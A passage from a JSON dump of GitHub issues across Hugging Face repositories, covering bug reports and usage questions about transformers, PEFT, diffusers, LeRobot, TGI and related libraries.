HfApi, especially in those edge cases (e.g. network unstable)\n\nSo what is the best replacement of HfFileSystem.glob with HfApi? Any suggestions?", "url": "https://github.com/huggingface/huggingface_hub/issues/3339", "state": "closed", "labels": [], "created_at": "2025-09-09T09:02:07Z", "updated_at": "2025-09-15T09:12:04Z", "user": "narugo1992" }, { "repo": "huggingface/transformers", "number": 40754, "title": "Potentially incorrect value assignment of Llama4TextModel's output in Llama4ForCausalLM's output?", "body": "### System Info\n\n**System Info** \n- `transformers` version: 4.55.4\n- Platform: Linux-6.15.9-201.fc42.x86_64-x86_64-with-glibc2.41\n- Python version: 3.13.5\n- Huggingface_hub version: 0.34.4\n- Safetensors version: 0.6.2\n- Accelerate version: 1.10.1\n- Accelerate config: \tnot found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.8.0+cu128 (CUDA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n- Using GPU in script?: \n- GPU type: NVIDIA RTX A6000\n\n### Who can help?\n\n@ArthurZucker \n@amyeroberts \n@qubvel \n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n**Task Detail**\nObtaining hidden_states from the outputs of Llama4ForCausalLM\n\n**Problem**\nIn the source code [modeling_llama4.py](https://github.com/huggingface/transformers/blob/v4.55.4/src/transformers/models/llama4/modeling_llama4.py), the outputs of Llama4ForCausalLM contains a *hidden_states* (See [line 642](https://github.com/huggingface/transformers/blob/d79b2d981f28b2730d402244ac3c2e9a8c054eee/src/transformers/models/llama4/modeling_llama4.py#L642)), which is assigned with *outputs.hidden_states*. Here, the *outputs* is the output of Llama4TextModel (See [line 619](https://github.com/huggingface/transformers/blob/d79b2d981f28b2730d402244ac3c2e9a8c054eee/src/transformers/models/llama4/modeling_llama4.py#L619C9-L619C16)). However, the output of Llama4TextModel consists of a *last_hidden_state* (assigned the value of *hidden_states*) and a *past_key_values*, but no *hidden_states* (See [line 554-557](https://github.com/huggingface/transformers/blob/d79b2d981f28b2730d402244ac3c2e9a8c054eee/src/transformers/models/llama4/modeling_llama4.py#L554-L557)).\n\nThus, I'm wondering if there is either a typo in [line 642](https://github.com/huggingface/transformers/blob/d79b2d981f28b2730d402244ac3c2e9a8c054eee/src/transformers/models/llama4/modeling_llama4.py#L642) where the *hidden_states=outputs.hidden_states* should be replaced by *hidden_states=outputs.last_hidden_state*, or a typo in [line 555](https://github.com/huggingface/transformers/blob/d79b2d981f28b2730d402244ac3c2e9a8c054eee/src/transformers/models/llama4/modeling_llama4.py#L555C13-L555C45) where the *last_hidden_state=hidden_states* should be replaced by *hidden_states=hidden_states*?\n\nThank you for your patience!\n\n### Expected behavior\n\nAn explanation or a correction of the source code in [modeling_llama4.py](https://github.com/huggingface/transformers/blob/v4.55.4/src/transformers/models/llama4/modeling_llama4.py)", "url": "https://github.com/huggingface/transformers/issues/40754", "state": "closed", "labels": [ "Usage", "bug" ], "created_at": "2025-09-08T12:31:39Z", "updated_at": "2025-09-16T19:25:03Z", "comments": 3, "user": "st143575" }, { "repo": "huggingface/transformers", "number": 40752, "title": "How to extract attention weights for the first generated token?", "body": "**Title:** Request for clarification: How to extract attention weights for the first generated token?\n\n**Description:**\n\nHi, I'm trying to extract the attention weights **of the first generated token** (i.e., the first new token produced by `generate()`) with respect to the input prompt. However, I'm observing inconsistent behavior in the shape of `attentions` returned by `model.generate(..., output_attentions=True)`.\n\nHere's what I found:\n\n- For `step 0` (the first generation step), `attentions[0][layer].shape` is `(batch, heads, seq_len, seq_len)` \u2014 e.g., `[1, 16, 1178, 1178]`, where `seq_len` equals the input prompt length.\n- This appears to be the **full self-attention matrix of the prompt context**, not the attention of the newly generated token.\n- Starting from `step 1`, the shape becomes `(batch, heads, 1, ctx_len)`, which correctly represents the attention of a single generated token.\n\n**Question:**\n- Is there a way to directly extract the attention weights **from the first generated token** (i.e., the query of the first new token attending to the prompt keys)?\n- Or is the intended behavior to use the last position of the context attention (i.e., `attentions[0][layer][..., -1, :]`) as a proxy for the generation decision?\n\n**Use Case:**\nI want to interpret which parts of the input prompt the model attends to when generating the first output token, for interpretability and analysis purposes.\n\n**Environment:**\n- Transformers version: [4.51.3]\n- Model: [Qwen3]\n- Code snippet:\n ```python\n outputs = model.generate(\n input_ids,\n output_attentions=True,\n return_dict_in_generate=True\n )\n # outputs.attentions[0][layer] has shape (1, 16, 1178, 1178)", "url": "https://github.com/huggingface/transformers/issues/40752", "state": "closed", "labels": [], "created_at": "2025-09-08T09:53:16Z", "updated_at": "2025-09-08T11:41:22Z", "user": "VincentLHH" }, { "repo": "huggingface/transformers.js", "number": 1407, "title": "Expected time to load a super-resolution model locally", "body": "### Question\n\nLoading a image super-resolution model locally can take more than 10 seconds on my MacBook Pro (M1 Max). Is this expected behavior?\n```javascript\nenv.allowRemoteModels = false;\nenv.allowLocalModels = true;\nenv.backends.onnx.wasm.wasmPaths = `/wasm/`;\n\nconst upscaler = ref(null);\nonMounted(async () => {\n upscaler.value = await pipeline('image-to-image', 'Xenova/swin2SR-realworld-sr-x4-64-bsrgan-psnr', {\n dtype: 'fp32',\n device: 'webgpu',\n })\n});\n```\nWarnings observed during the model loading:\n```\nort-wasm-simd-threaded.jsep.mjs:100 \n2025-09-08 13:58:52.881399 [W:onnxruntime:, session_state.cc:1280 VerifyEachNodeIsAssignedToAnEp] Some nodes were not assigned to the preferred execution providers which may or may not have an negative impact on performance. e.g. ORT explicitly assigns shape related ops to CPU to improve perf.\n\nort-wasm-simd-threaded.jsep.mjs:100 \n2025-09-08 13:58:52.882499 [W:onnxruntime:, session_state.cc:1282 VerifyEachNodeIsAssignedToAnEp] Rerunning with verbose output on a non-minimal build will show node assignments.\n```\n\n### System Info\nnpm: @huggingface/transformers@3.7.2\nOS: macOS Sequoia 15.6.1\nmodel: Xenova/swin2SR-realworld-sr-x4-64-bsrgan-psnr", "url": "https://github.com/huggingface/transformers.js/issues/1407", "state": "closed", "labels": [ "question" ], "created_at": "2025-09-08T06:26:49Z", "updated_at": "2025-09-30T19:22:34Z", "user": "ymtoo" }, { "repo": "huggingface/lerobot", "number": 1891, "title": "How to checkout a commit id?", "body": "The underlying datasets supports a \"revision\" flag. Does lerobot?", "url": "https://github.com/huggingface/lerobot/issues/1891", "state": "closed", "labels": [], "created_at": "2025-09-08T04:39:37Z", "updated_at": "2025-09-10T22:53:18Z", "user": "richardrl" }, { "repo": "huggingface/transformers", "number": 40743, "title": "Support for 4D attention mask for T5", "body": "### Feature request\n\nCurrently, T5 cannot take 4D attention masks (batch_size, num_heads, seq_len, seq_len) as inputs. Passing a 4D attention_mask and a 4D decoder_attention_mask like so leads to a shape-related exception :\n\n```python\nimport torch\nfrom transformers import AutoTokenizer, T5ForConditionalGeneration\n\ntokenizer = AutoTokenizer.from_pretrained(\"google-t5/t5-small\")\nmodel = T5ForConditionalGeneration.from_pretrained(\"google-t5/t5-small\")\n\ninput_ids = tokenizer(\"Where is\", return_tensors=\"pt\").input_ids\ndecoder_input_ids = tokenizer(\"\", return_tensors=\"pt\").input_ids\n\nbatch_size, seq_len = input_ids.shape\ntgt_len = decoder_input_ids.shape[1]\nnum_heads = model.config.num_heads\n\nattention_mask = torch.ones(batch_size, num_heads, seq_len, seq_len)\ndecoder_attention_mask = torch.ones(batch_size, num_heads, tgt_len, tgt_len).tril(0)\n\nmodel(\n input_ids,\n decoder_input_ids=decoder_input_ids,\n attention_mask=attention_mask,\n decoder_attention_mask=decoder_attention_mask,\n)\n```\n\nOne of the problems in the current code is in the handling of the cross-attention mask. Currently, it is created using the 1D encoder attention mask when supplied. However, in the case of a 4D mask, it seems unclear how to correctly use the encoder mask: therefore, the best solution might be to introduce a new 4D mask argument `cross_attention_mask` of shape (batch_size, num_heads, tgt_len, seq_len)`. This lets the user controls all attention masks if necessary.\n\n### Motivation\n\n4D masks are useful for many purposes, as outlined by #27539 and [this blog post](https://huggingface.co/blog/poedator/4d-masks), but not all models support them.\n\n### Your contribution\n\nI propose to fix the code to handle 4D attention masks, and to add a new `cross_attention_mask` argument to add the possibility to control the cross attention mask manually. I wrote a version of that code in [this fork](https://github.com/Aethor/transformers/tree/t5-4d-attention-mask).\n\nI'm happy to create a PR with my code, but:\n\n1. This is my first transformers contribution, I need help with some things such as handling the \"Copy\" code duplication mechanism of transformers. Should other similar models with copied functions from T5 be changed as well?\n2. Although I wrote a [first test with trivial masks](https://github.com/Aethor/transformers/blob/22dc62edbdbc3f2afeb90a31c75047711c1afc5c/tests/models/t5/test_modeling_t5.py#L1876), I am not entirely sure how to test this\n3. I want to be sure that adding the new `cross_attention` mask parameter is the right way to do this and will be approved", "url": "https://github.com/huggingface/transformers/issues/40743", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-09-07T07:18:05Z", "updated_at": "2025-09-09T11:43:33Z", "comments": 5, "user": "Aethor" }, { "repo": "huggingface/lerobot", "number": 1882, "title": "Pretrain - Code for pretraining smolvla", "body": "## Guidance on Replicating the Pre-training Process with Community Datasets\n\n\nHi team,\n\nFirst off, thank you for the fantastic work on SmolVLA and for open-sourcing the model and code. It's a great contribution to the community.\n\nI am trying to replicate the pre-training process as described in the original paper. I have located the pre-training data on the Hugging Face Hub, specifically:\n\n- `HuggingFaceVLA/community_dataset_v1`\n- `HuggingFaceVLA/community_dataset_v2`\n\nMy plan is to download both datasets and merge them into a single directory, for example `/path/to/my/pretrain_data/`, to serve as the input for the pre-training script.\n\nTo ensure I am on the right track, I would be grateful if you could provide some guidance on the following points:\n\n1: **Data Preparation & Merging**: Regarding the two datasets (community_dataset_v1 and v2), what is the correct procedure for using them together? Should I manually download and merge their contents into a single local directory? I also noticed the data is in a multi-directory (sharded) format, unlike many simpler single-folder datasets. Does the training code handle this structure automatically once the data is prepared locally?\n\n2: **Dataset Configuration**: How should the combined dataset be specified in the configuration file? My main confusion is that the parameter dataset.repo_id appears to be a required field that accepts a single repository ID. How can I configure the training script to use the merged data from both v1 and v2, which I have stored locally?\n\n3: **Training Script & Execution**: Once the data is correctly prepared and configured, could you please point me to the exact script and provide an example command to launch the pre-training? Since the weight of VLM is initialized, so what I need is the script after initializing VLM weight and then train on large-scale community dataset. In particular, I'd like to ask the `dataset.repo_id` if I store v1 and v2 under the same folder? Since I discovered this param cannot be None. \n\nAny help or pointers to the relevant documentation would be greatly appreciated. I believe a short tutorial or a section in the README on pre-training would also be immensely helpful for others in the community looking to build upon your work.\n\nThank you for your time and consideration!", "url": "https://github.com/huggingface/lerobot/issues/1882", "state": "closed", "labels": [ "question", "dataset" ], "created_at": "2025-09-07T03:18:04Z", "updated_at": "2025-09-23T09:06:13Z", "user": "ruiheng123" }, { "repo": "huggingface/transformers", "number": 40708, "title": "When using a custom model, it copies the code into Hugging Face\u2019s cache directory.", "body": "```\n model = AutoModel.from_pretrained(\n model_args.model_name_or_path,\n trust_remote_code=True,\n torch_dtype=compute_dtype,\n device_map=device_map,\n # init_vision=True,\n # init_audio=False,\n # init_tts=False,\n )\n```\n`model_args.model_name_or_path=/mnt/241hdd/wzr/MiniCPM-V-CookBook/MiniCPM-V-4_5`\nThe code actually runs in `/root/.cache/huggingface/modules/transformers_modules/MiniCPM-V-4_5`.\nThis makes my debugging difficult.\nIs there a way to run the code directly?", "url": "https://github.com/huggingface/transformers/issues/40708", "state": "closed", "labels": [], "created_at": "2025-09-05T07:21:40Z", "updated_at": "2025-11-15T08:03:16Z", "comments": 4, "user": "wzr0108" }, { "repo": "huggingface/transformers", "number": 40690, "title": "Batches loaded from wrong epoch when resuming from second epoch", "body": "### System Info\n\n**Required system information**\n```text\n- `transformers` version: 4.57.0.dev0\n- Platform: Linux-5.15.0-133-generic-x86_64-with-glibc2.35\n- Python version: 3.10.12\n- Huggingface_hub version: 0.34.4\n- Safetensors version: 0.6.2\n- Accelerate version: 1.10.1\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.8.0+cu128 (CUDA)\n- Tensorflow version (GPU?): 2.15.1 (False)\n- Flax version (CPU?/GPU?/TPU?): 0.7.0 (cpu)\n- Jax version: 0.4.13\n- JaxLib version: 0.4.13\n- Using distributed or parallel set-up in script?: no\n- Using GPU in script?: no\n- GPU type: GRID A100D-16C\n```\n\n### Who can help?\n\n@zach-huggingface @SunMarc as it concerns `transfomers`' `Trainer`\n\n### Information\n\n- [x] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n### **1. Bug description**\nLet's take the example of the provided script: \n- number of data points: 10\n- batch size: 2\nSo 1 epoch = 5 steps.\n\nIf we launch a training until the end and monitor the data order:\n- epoch 0: 4, 1, 7, 5, 3, 9, 0, 8, 6, 2\n- epoch 1: 5, 6, **|| 1, 2, 0, 8, 9, 3, 7, 4**\n- epoch 2: 8, 7, 1, 5, 6, 9, 0, 4, 2, 3\n\nBut if we stop the training at step 6 and resume (from character `||`) the training to the end, we get the following data order:\n- epoch 0: 4, 1, _7, 5, 3, 9, 0, 8, 6, 2_\n- epoch 1: 5, 6 **|| 7, 5, 3, 9, 0, 8, 6, 2**\n- epoch 2: 8, 7, 1, 5, 6, 9, 0, 4, 2, 3\n\nWe spotted that the `epoch_dataloader.iteration` is not properly set for the first epoch after resuming. It is initially set to 0, this is why it loads the same order as in epoch 0 (cf data order in italic of the last 4 batches of epoch 0).\n\n### **2. Reproducing the error**\nThe script to run is available at https://github.com/ngazagna-qc/transformers/blob/fix-data-order-resumed-epoch/reproduce_wrong_resumed_epoch.py.\nRun:\n```shell\npython reproduce_wrong_resumed_epoch.py --trainer-class Trainer\n```\n\n### Expected behavior\n\n### **3. Bug fix**\nWe provide the fixed `Trainer` here: https://github.com/ngazagna-qc/transformers/blob/fix-data-order-resumed-epoch/src/transformers/trainer_fixed.py#L56\n\nThe fix only consists to add a line to the `_inner_training_loop` method:\n```python\n if steps_trained_in_current_epoch > 0:\n epoch_dataloader = skip_first_batches(epoch_dataloader, steps_trained_in_current_epoch)\n #### BEGINNING OF THE FIX ####\n epoch_dataloader.iteration = epochs_trained # FIX: set dataloader to correct epoch\n #### END OF THE FIX ####\n steps_skipped = steps_trained_in_current_epoch\n steps_trained_in_current_epoch = 0\n rng_to_sync = True\n```\nIt can be tested that this solves the order by running:\n```shell\npython reproduce_wrong_resumed_epoch.py --trainer-class TrainerFixed\n```", "url": "https://github.com/huggingface/transformers/issues/40690", "state": "closed", "labels": [ "bug" ], "created_at": "2025-09-04T11:48:41Z", "updated_at": "2025-12-03T13:14:04Z", "comments": 6, "user": "ngazagna-qc" }, { "repo": "huggingface/optimum", "number": 2347, "title": "Gemma3n convert to onnx format", "body": "Hello, \n\nHow do I convert the Gemma3n model to the ONNX format using the OptimumCLI command? \n\nThanks in advance.", "url": "https://github.com/huggingface/optimum/issues/2347", "state": "closed", "labels": [ "Stale" ], "created_at": "2025-09-04T09:13:19Z", "updated_at": "2025-10-15T02:09:55Z", "comments": 2, "user": "shahizat" }, { "repo": "huggingface/transformers", "number": 40680, "title": "Idea: Exploring Mathematical Extensions for GPT-style Models (teaser)", "body": "Hi Transformers team \ud83d\udc4b,\n\nI\u2019ve been experimenting with a conceptual enhancement to GPT-style architectures\u2014introducing mathematical mechanisms for memory and adaptive learning\u2014while keeping the overall transformer backbone intact.\n\nI\u2019ve documented the approach in Markdown (README + comparison notes), but haven\u2019t published it yet. Before I share more, I\u2019d love your input:\n\n- Does this kind of experimental idea fit within the scope of Transformers?\n- Would you be open to viewing or discussing the draft privately?\n\nLooking forward to hearing your thoughts \ud83d\ude4f", "url": "https://github.com/huggingface/transformers/issues/40680", "state": "closed", "labels": [], "created_at": "2025-09-04T07:23:29Z", "updated_at": "2025-10-12T08:02:38Z", "comments": 3, "user": "muzamil-ashiq" }, { "repo": "huggingface/transformers", "number": 40647, "title": "how to get response text during training", "body": "I want to obtain the inferred output text during the evaluation step in the training process, not just the eval loss. \n\"Image\"", "url": "https://github.com/huggingface/transformers/issues/40647", "state": "closed", "labels": [], "created_at": "2025-09-03T10:37:51Z", "updated_at": "2025-10-12T08:02:43Z", "user": "zyandtom" }, { "repo": "huggingface/diffusers", "number": 12276, "title": "The image is blurry.", "body": "How to solve image blurriness during fine-tuning?", "url": "https://github.com/huggingface/diffusers/issues/12276", "state": "open", "labels": [], "created_at": "2025-09-03T08:29:38Z", "updated_at": "2025-09-03T08:29:38Z", "comments": 0, "user": "sucessfullys" }, { "repo": "huggingface/gym-hil", "number": 32, "title": "how to perform hil in sim", "body": "", "url": "https://github.com/huggingface/gym-hil/issues/32", "state": "closed", "labels": [], "created_at": "2025-09-02T17:10:05Z", "updated_at": "2025-09-16T14:02:32Z", "user": "prathamv0811" }, { "repo": "huggingface/transformers", "number": 40606, "title": "GPT-OSS attention backends available for SM120 other than Eager?", "body": "I was wondering any attention backend we can use for long context if using SM120 GPU? Since the \"eager_attention_forward\" uses the naive implementation that computes the full attention in one go, which can lead to OOM for large context, but I couldn't use other implementations since they either do not support sinks or SM120.\n\nMany thanks! ", "url": "https://github.com/huggingface/transformers/issues/40606", "state": "closed", "labels": [], "created_at": "2025-09-02T03:21:16Z", "updated_at": "2025-10-12T08:02:48Z", "comments": 4, "user": "TheTinyTeddy" }, { "repo": "huggingface/peft", "number": 2764, "title": "merge_and_unload returns the base (prior to fine-tuning) back!!!!", "body": "I have fine-tune a model using PEFT and now I want to merge the base model to adapter. This is what I am doing:\n\n\n```\nbase_model = AutoModelForCausalLM(model_id, device_map = 'auto')\n\nmodel_finetuned = PeftModel.from_pretrained(base_model, adapter_path)\n\n```\nNow the size of `model_finetuned `is roughly 42GB but when I do the following to merge the adapter into base:\n\n`merged_model = model_finetuned.()\n`\nthe size of `merged_model `is 36GB and its performance is like the base model, seems the adapter effect is gone.\n\nI remember I used this feature in the past to get merged model, is anything changed? \n\nThis is related post, where the last comment says this is normal, can someone elaborate?\n\nhttps://github.com/huggingface/peft/issues/868\n\nCan I just save the `model_finetuned ` as my merged model, can someone explain what is going on and why the merge_and_unload() is doing opposite of what it is supposed to do.\n", "url": "https://github.com/huggingface/peft/issues/2764", "state": "closed", "labels": [], "created_at": "2025-09-01T04:07:36Z", "updated_at": "2025-10-09T15:26:15Z", "comments": 12, "user": "manitadayon" }, { "repo": "huggingface/lerobot", "number": 1822, "title": "As of 08/31/2025, how do you create a v2.1 dataset from raw data?", "body": "My search is cursory, but I can't find any tutorial or example on creating a v2.1 dataset on the main branch. So, how do you create a Lerobot dataset in the current version? Should I refer to older commits", "url": "https://github.com/huggingface/lerobot/issues/1822", "state": "open", "labels": [ "question", "dataset" ], "created_at": "2025-08-31T18:29:34Z", "updated_at": "2025-10-08T13:02:44Z", "user": "IrvingF7" }, { "repo": "huggingface/text-generation-inference", "number": 3318, "title": "Infinite tool call loop: `HuggingFaceModel` and `text-generation-inference`", "body": "## Description\nHello. Needless to say, amazing library. Please let me know if you'd like me to try something or if you need more info.\n\nI've been going through various local model providers trying to find one that works well, when I cam across a rather shocking bug when running against Huggingface's TGI model host.\n\nThe problem appears whether using the OpenAI \"compatible\" endpoints or the `HuggingfaceModel` with custom `AsyncInferenceClient` and `HuggingFaceProvider`. The latter probably being the official approach, the code included here will be using that.\n\n## System Info\n`curl 127.0.0.1:8080/info | jq`:\n```json\n{\n \"model_id\": \"/models/meta-llama/Meta-Llama-3-8B-Instruct\",\n \"model_sha\": null,\n \"model_pipeline_tag\": null,\n \"max_concurrent_requests\": 128,\n \"max_best_of\": 2,\n \"max_stop_sequences\": 4,\n \"max_input_tokens\": 8191,\n \"max_total_tokens\": 8192,\n \"validation_workers\": 2,\n \"max_client_batch_size\": 4,\n \"router\": \"text-generation-router\",\n \"version\": \"3.3.4-dev0\",\n \"sha\": \"9f38d9305168f4b47c8c46b573f5b2c07881281d\",\n \"docker_label\": \"sha-9f38d93\"\n}\n```\n\n`nvidia-smi`:\n```shell\n+-----------------------------------------------------------------------------------------+\n| NVIDIA-SMI 575.64.05 Driver Version: 575.64.05 CUDA Version: 12.9 |\n|-----------------------------------------+------------------------+----------------------+\n| GPU Name Persistence-M | Bus-Id Disp.A | Volatile Uncorr. ECC |\n| Fan Temp Perf Pwr:Usage/Cap | Memory-Usage | GPU-Util Compute M. |\n| | | MIG M. |\n|=========================================+========================+======================|\n| 0 NVIDIA GeForce RTX 4090 Off | 00000000:01:00.0 On | Off |\n| 40% 54C P2 61W / 450W | 21499MiB / 24564MiB | 0% Default |\n| | | N/A |\n+-----------------------------------------+------------------------+----------------------+\n| 1 NVIDIA GeForce RTX 4090 Off | 00000000:48:00.0 Off | Off |\n| 30% 43C P2 52W / 450W | 21394MiB / 24564MiB | 0% Default |\n| | | N/A |\n+-----------------------------------------+------------------------+----------------------+\n```\n\n### Information\n\n- [x] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [x] An officially supported command\n- [ ] My own modifications\n\n## Reproduction\n\n### Setup\n\nHere's the `docker-compose.yaml` I'm using to start TGI:\n```yaml\nservices:\n text-generation-inference:\n image: ghcr.io/huggingface/text-generation-inference:latest\n container_name: tgi\n ports:\n - \"8081:80\"\n volumes:\n - ../../../models:/models:ro\n - tgi-data:/data\n environment:\n - RUST_LOG=info\n # I have also tested with 3.1-8B and 3.2-3B with the same end results\n command: >\n --model-id /models/meta-llama/Meta-Llama-3-8B-Instruct\n --hostname 0.0.0.0\n --port 80\n --trust-remote-code\n deploy:\n resources:\n reservations:\n devices:\n - driver: nvidia\n device_ids: [\"0\", \"1\"]\n capabilities: [gpu]\n shm_size: \"64g\"\n healthcheck:\n test: [\"CMD\", \"curl\", \"-f\", \"http://localhost:80/health\"]\n interval: 30s\n timeout: 10s\n retries: 3\n start_period: 60s\n\nvolumes:\n tgi-data:\n driver: local\n```\n\n### Code\n\nAll code is running in a Jupyter notebook.\n\nHere's the common setup cell:\n```python\nfrom huggingface_hub import AsyncInferenceClient\nfrom pydantic_ai.models.huggingface import HuggingFaceModel\nfrom pydantic_ai.providers.huggingface import HuggingFaceProvider\nfrom pydantic_ai.providers.openai import OpenAIProvider\n\nprovider = OpenAIProvider(base_url=\"http://localhost:8081/v1\") # Just used to get the model slug\nmodels = await provider.client.models.list()\n\nclient = AsyncInferenceClient(base_url=\"http://localhost:8081/\")\n\nprint(f\"Connected to TGI. Available models: {len(models.data)}\")\nfor model in models.data:\n print(f\" - {model.id}\")\n\n# Create the model instance\nagent_model = HuggingFaceModel(\n models.data[0].id,\n provider=HuggingFaceProvider(hf_client=client, api_key=\"None\"),\n # Annoyingly, despite this being basically the default profile, Llama 3's tool calls often fall through to the response without this\n profile=ModelProfile(\n supports_tools=True,\n json_schema_transformer=InlineDefsJsonSchemaTransformer\n )\n)\n```\n\n### Working: Basic requests and history\n\n1. Create the basic agent\n```python\nfrom pydantic_ai import Agent\n\nsimple_agent = Agent(model=agent_model)\n```\n\n2. Make a simple request\n```python\nsimple_result = await simple_agent.run(\"Tell me a joke.\")\n\nsimple_result.output # \"Why couldn't the bicycle stand up by itself?\\n\\nBecau", "url": "https://github.com/huggingface/text-generation-inference/issues/3318", "state": "open", "labels": [], "created_at": "2025-08-31T08:23:46Z", "updated_at": "2025-08-31T08:58:13Z", "comments": 1, "user": "baughmann" }, { "repo": "huggingface/diffusers", "number": 12257, "title": "[Looking for community contribution] support Wan 2.2 S2V: an audio-driven cinematic video generation model", "body": "We're super excited about the Wan 2.2 S2V (Speech-to-Video) model and want to get it integrated into Diffusers! This would be an amazing addition, and we're looking for experienced community contributors to help make this happen.\n\n\n- **Project Page**: https://humanaigc.github.io/wan-s2v-webpage/\n- **Source Code**: https://github.com/Wan-Video/Wan2.2#run-speech-to-video-generation\n- **Model Weights**: https://huggingface.co/Wan-AI/Wan2.2-S2V-14B\n\n\nThis is a priority for us, so we will try review fast and actively collabrate with you throughout the process :)\n\n\n", "url": "https://github.com/huggingface/diffusers/issues/12257", "state": "open", "labels": [ "help wanted", "Good second issue", "contributions-welcome" ], "created_at": "2025-08-29T08:04:43Z", "updated_at": "2025-08-29T10:23:52Z", "comments": 0, "user": "yiyixuxu" }, { "repo": "huggingface/optimum-onnx", "number": 44, "title": "How to use streaming inference for onnx models exported from QWEN3-4B models", "body": "How to use streaming inference for onnx models exported from QWEN3-4B models", "url": "https://github.com/huggingface/optimum-onnx/issues/44", "state": "closed", "labels": [], "created_at": "2025-08-29T01:48:07Z", "updated_at": "2025-10-06T12:29:34Z", "user": "williamlzw" }, { "repo": "huggingface/diffusers", "number": 12255, "title": "[BUG] Misleading ValueError when subclassing StableDiffusionImg2ImgPipeline with a mismatched __init__ signature", "body": "### Describe the bug\n\nWhen subclassing diffusers.StableDiffusionImg2ImgPipeline, if the subclass's __init__ signature does not include the requires_safety_checker: bool = True argument, the default .from_pretrained() loader raises a confusing and indirect ValueError.\n\nThe official documentation for StableDiffusionImg2ImgPipeline confirms that requires_safety_checker is an explicit keyword argument in its __init__ signature.\n\nThe current ValueError (pasted below) reports a component list mismatch between 'kwargs' and 'requires_safety_checker'. This error message hides the true root cause\u2014a TypeError from the signature mismatch\u2014making the problem very difficult to debug.\n\n### Reproduction\n\nThe following minimal script reliably reproduces the error.\n```\n\nfrom diffusers import StableDiffusionImg2ImgPipeline\nfrom diffusers.models import AutoencoderKL, UNet2DConditionModel\nfrom diffusers.schedulers import KarrasDiffusionSchedulers\nfrom transformers import CLIPTextModel, CLIPTokenizer\nfrom typing import Optional, Any\n\n# A custom pipeline inheriting from StableDiffusionImg2ImgPipeline,\n# but with an incorrect __init__ signature. It incorrectly tries\n# to catch `requires_safety_checker` with **kwargs.\nclass MyCustomPipeline(StableDiffusionImg2ImgPipeline):\n def __init__(\n self,\n vae: AutoencoderKL,\n text_encoder: CLIPTextModel,\n tokenizer: CLIPTokenizer,\n unet: UNet2DConditionModel,\n scheduler: KarrasDiffusionSchedulers,\n safety_checker: Optional[Any] = None,\n feature_extractor: Optional[Any] = None,\n image_encoder: Optional[Any] = None,\n **kwargs,\n ):\n super().__init__(\n vae=vae,\n text_encoder=text_encoder,\n tokenizer=tokenizer,\n unet=unet,\n scheduler=scheduler,\n safety_checker=safety_checker,\n feature_extractor=feature_extractor,\n image_encoder=image_encoder,\n **kwargs,\n )\n\n# This line will fail and raise the misleading ValueError.\n# It can be copy-pasted directly to reproduce the bug.\npipe = MyCustomPipeline.from_pretrained(\"runwayml/stable-diffusion-v1-5\")\n```\n### Logs\n\n```shell\nValueError: MyCustomPipeline {\n \"_class_name\": \"MyCustomPipeline\",\n \"_diffusers_version\": \"0.29.0.dev0\", # Replace with your version\n \"feature_extractor\": [\n \"transformers\",\n \"CLIPImageProcessor\"\n ],\n \"image_encoder\": [\n null,\n null\n ],\n \"requires_safety_checker\": true,\n \"safety_checker\": [\n \"stable_diffusion\",\n \"StableDiffusionSafetyChecker\"\n ],\n \"scheduler\": [\n \"diffusers\",\n \"PNDMScheduler\"\n ],\n \"text_encoder\": [\n \"transformers\",\n \"CLIPTextModel\"\n ],\n \"tokenizer\": [\n \"transformers\",\n \"CLIPTokenizer\"\n ],\n \"unet\": [\n \"diffusers\",\n \"UNet2DConditionModel\"\n ],\n \"vae\": [\n \"diffusers\",\n \"AutoencoderKL\"\n ]\n}\n has been incorrectly initialized or is incorrectly implemented. Expected ['feature_extractor', 'image_encoder', 'kwargs', 'safety_checker', 'scheduler', 'text_encoder', 'tokenizer', 'unet', 'vae'] to be defined, but ['feature_extractor', 'image_encoder', 'requires_safety_checker', 'safety_checker', 'scheduler', 'text_encoder', 'tokenizer', 'unet', 'vae'] are defined.\n```\n\n### System Info\n\ndiffusers version: 0.34.0\nPlatform: Linux-5.15.0-78-generic-x86_64-with-glibc2.35\nPython version: 3.12.11 | [GCC 11.2.0]\nPyTorch version: 2.5.1+cu121\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12255", "state": "closed", "labels": [ "bug" ], "created_at": "2025-08-28T18:31:14Z", "updated_at": "2025-08-30T07:41:16Z", "comments": 2, "user": "BoostZhu" }, { "repo": "huggingface/peft", "number": 2759, "title": "PeftModel trainable parameters with multiple adapters", "body": "### System Info\n\npeft-0.17.1\npython 3.9\n\n### Who can help?\n\n@BenjaminBossan \n\n### Reproduction\n\n**1) modules_to_save gradient true even when is_trainable=False**\n\nThe adapters has both modules_to_save and target_modules\n\n```\npeft_backbone = PeftModel.from_pretrained(\n target_backbone,\n safe_encoder_adapter_path1,\n adapter_name=adapter_name1,\n is_trainable=False\n )\n status = peft_backbone.get_model_status()\n check_trainable_params(target_backbone)\n```\n\n```\ndef check_trainable_params(model, print_layers=True):\n total_params = 0\n trainable_params = 0\n for name, param in model.named_parameters():\n num_params = param.numel()\n total_params += num_params\n if param.requires_grad:\n trainable_params += num_params\n if print_layers:\n print(f\"[TRAINABLE] {name} - shape: {tuple(param.shape)}\")\n elif print_layers:\n print(f\"[FROZEN] {name} - shape: {tuple(param.shape)}\")\n\n print(f\"\\nTotal parameters: {total_params:,}\")\n print(f\"Trainable parameters: {trainable_params:,}\")\n print(f\"Frozen parameters: {total_params - trainable_params:,}\")\n print(f\"Trainable ratio: {100 * trainable_params / total_params:.2f}%\")\n\n return trainable_params, total_params\n```\n\nexample of printed trainable params \n[TRAINABLE] blocks.0.modules_to_save.adapter1.norm1.weight - shape: (1408,)\n[FROZEN] blocks.2.attn.qkv.lora_A.adapter1.weight - shape: (32, 1408)\n\n\n**2) Loading an adapter after using 